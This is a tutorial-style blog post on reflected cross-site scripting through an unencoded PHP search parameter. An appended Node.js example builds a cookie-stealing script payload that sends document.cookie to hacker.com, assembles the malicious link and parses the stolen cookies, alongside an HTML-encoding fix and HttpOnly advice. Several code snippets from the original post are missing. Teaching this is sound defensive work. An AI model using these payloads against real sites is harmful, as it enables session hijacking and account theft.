In this post I will briefly explain what Reflected Cross-Site Scripting (a form of XSS) is, and how attackers use this vulnerability to steal a site's cookies. Let's start with what XSS actually is.
What is Cross-Site Scripting
Cross-Site Scripting (XSS) is one of the most common web application vulnerabilities. It allows attackers to execute malicious scripts in a victim's browser, in the context of the vulnerable site. In this article I will explain why XSS occurs, what kinds of attacks it exposes us to, and what we should do to close XSS vulnerabilities.
What is Reflected XSS:
Reflected XSS is usually considered the least severe XSS variant, because the payload is never stored on the server: it travels in a single request (typically a URL parameter) and executes only in the browser of whoever opens that URL. A search bar is the classic case. The application takes the search term from the request and writes it back into the response page. If it does not HTML-encode the special characters (`<`, `>`, `"`, `'`, `&`) first, the browser cannot tell the reflected text from the page's own markup and interprets any tags in it as code. When the attacker types the payload into the search bar themselves, it runs only in their own browser; the attack becomes useful once they send a crafted link containing the payload to a victim.
The vulnerable piece of PHP code that causes the reflected XSS:
The search function above (written in PHP) applies no filtering or encoding to the input, so special characters, and therefore HTML tags, pass straight through into the response. Here is how the unfiltered HTML tags appear:
This lets the attacker inject HTML tags, for example a `<script>` tag carrying JavaScript that redirects the victim to the attacker's site and appends the victim's cookies to that request. Here is an example of JavaScript used in an XSS attack to redirect the victim to the attacker's site with their cookies attached:
JavaScript used in XSS attacks to steal the victim's cookies.
In this case we are dealing with reflected XSS, and in our example the payload travels in the URL, so the attacker sends the victim a malicious link that looks like this:
https://vulnerable.com/search.php?q=
When the victim clicks the link, the script runs in their browser: the victim is redirected to hacker.com, and the cookies the browser holds for vulnerable.com (those that are readable from JavaScript, i.e. not marked HttpOnly) are appended to that request, where hacker.com writes them to a file.
The cookies as stored on hacker.com, in a hidden path:
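The whole chain, as an added example that is not part of the original post: a minimal JavaScript (Node.js) model of the vulnerable search page, the cookie-stealing payload, the link the attacker sends, the attacker's collection side, and the HTML-encoding fix that stops the payload. The hosts vulnerable.com and hacker.com and the `q` parameter follow the post; the function names, the `c` parameter on the attacker's side and the sample cookie values are assumptions made for illustration.

```javascript
// Added example, not code from the original post. Models a reflected XSS
// via a search parameter, the cookie-stealing payload, and the fix.
// Hosts, parameter names and cookie values are assumed for illustration.

// --- Vulnerable rendering: the query is echoed into the page unencoded,
// as the post's PHP search page does with $_GET['q'].
function renderSearchVulnerable(query) {
  return `<h1>Results for: ${query}</h1>`;
}

// --- Fix: encode the HTML-significant characters before reflecting
// untrusted input into HTML. This is what PHP's
// htmlspecialchars($q, ENT_QUOTES, 'UTF-8') does.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

function renderSearchSafe(query) {
  return `<h1>Results for: ${escapeHtml(query)}</h1>`;
}

// --- Attacker side: the payload the post describes. document.cookie only
// returns cookies of the current origin that are NOT flagged HttpOnly.
const ATTACKER_HOST = 'https://hacker.com'; // assumed, following the post
const COOKIE_STEALER =
  `<script>location='${ATTACKER_HOST}/?c='+encodeURIComponent(document.cookie)</script>`;

// Build the link sent to the victim. URLSearchParams percent-encodes the
// payload; the victim's browser and PHP's $_GET decode it again on arrival.
function buildMaliciousLink(searchPageUrl, payload) {
  const u = new URL(searchPageUrl);
  u.searchParams.set('q', payload);
  return u.toString();
}

// Server side: decode q as $_GET would and render with the given renderer.
function serveSearch(requestUrl, render) {
  const q = new URL(requestUrl).searchParams.get('q') ?? '';
  return render(q);
}

// Crude response check a tester can run: did a reflected <script> tag
// survive intact? (Only catches script tags, not event-handler attributes.)
function containsLiveScript(html) {
  return /<script\b[^>]*>/i.test(html);
}

// hacker.com side: recover the exfiltrated cookies from the incoming
// request URL (the ?c= parameter is this example's own convention).
function parseStolenCookies(requestUrl) {
  const raw = new URL(requestUrl).searchParams.get('c') ?? '';
  return Object.fromEntries(
    raw.split('; ').filter(Boolean).map((kv) => {
      const i = kv.indexOf('=');
      return [kv.slice(0, i), kv.slice(i + 1)];
    })
  );
}

// Walk-through with a constructed sample cookie jar.
const link = buildMaliciousLink('https://vulnerable.com/search.php', COOKIE_STEALER);
console.log(link);
console.log(containsLiveScript(serveSearch(link, renderSearchVulnerable))); // true
console.log(containsLiveScript(serveSearch(link, renderSearchSafe)));       // false
const exfil = `${ATTACKER_HOST}/?c=${encodeURIComponent('PHPSESSID=abc123; theme=dark')}`;
console.log(parseStolenCookies(exfil)); // { PHPSESSID: 'abc123', theme: 'dark' }
```

Two points worth keeping in mind when reading this: output encoding (`renderSearchSafe`) is the fix for the XSS itself, since the payload is then displayed as text instead of executed; marking the session cookie `HttpOnly` is a separate, defence-in-depth measure that keeps it out of `document.cookie` and so out of this particular payload, but it does not remove the injection.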
THE END
In this post I wrote about the Cross-Site Scripting (XSS) attack. If it was helpful for you, please comment below, and if you want to support me you can send me some coffees ;D